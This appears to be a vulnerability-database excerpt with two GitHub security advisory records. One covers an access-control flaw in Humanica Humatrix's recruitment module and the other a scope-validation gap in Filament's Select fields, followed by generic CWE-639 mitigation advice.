"CVE-2019-14932"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-08-12T13:15:00Z",
"severity": "HIGH"
},
"details": "The Recruitment module in Humanica Humatrix 7 1.0.0.681 and 1.0.0.203 allows remote attackers to access all candidates\u0027 information on the website via a modified selApp variable to personalData/resumeDetail.cfm. This includes personal information and other sensitive data.",
"id": "GHSA-7q39-r2hm-j8m9",
"modified": "2024-04-04T01:36:59Z",
"published": "2022-05-24T16:53:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14932"
},
{
"type": "WEB",
"url": "https://gist.github.com/donut117/1ddbb8290a1186502da81b46a5d53c63"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-7Q3W-XQJW-G3CR
Vulnerability from github – Published: 2026-06-11 20:26 – Updated: 2026-06-11 20:26The recordSelectOptionsQuery() method may be used to scope the options available in the Select field for AttachAction and AssociateAction. However, the built-in validation rule for these fields did not apply the same scope. As a result, a user who can trigger these actions could tamper with the Livewire component's state and submit an out-of-scope value.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.3.50"
},
"package": {
"ecosystem": "Packagist",
"name": "filament/tables"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.3.51"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.11.3"
},
"package": {
"ecosystem": "Packagist",
"name": "filament/actions"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.11.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.6.3"
},
"package": {
"ecosystem": "Packagist",
"name": "filament/actions"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.6.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48067"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-11T20:26:07Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "The `recordSelectOptionsQuery()` method may be used to scope the options available in the `Select` field for `AttachAction` and `AssociateAction`. However, the built-in validation rule for these fields did not apply the same scope. As a result, a user who can trigger these actions could tamper with the Livewire component\u0027s state and submit an out-of-scope value.",
"id": "GHSA-7q3w-xqjw-g3cr",
"modified": "2026-06-11T20:26:07Z",
"published": "2026-06-11T20:26:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/filamentphp/filament/security/advisories/GHSA-7q3w-xqjw-g3cr"
},
{
"type": "PACKAGE",
"url": "https://github.com/filamentphp/filament"
},
{
"type": "WEB",
"url": "https://github.com/filamentphp/filament/releases/tag/v3.3.51"
},
{
"type": "WEB",
"url": "https://github.com/filamentphp/filament/releases/tag/v4.11.4"
},
{
"type": "WEB",
"url": "https://github.com/filamentphp/filament/releases/tag/v5.6.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Filament has inconsistent scope enforcement for its AttachAction and AssociateAction Select fields"
}
Mitigation
For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.
Mitigation
Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.
Mitigation
Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.
No CAPEC attack patterns related to this CWE.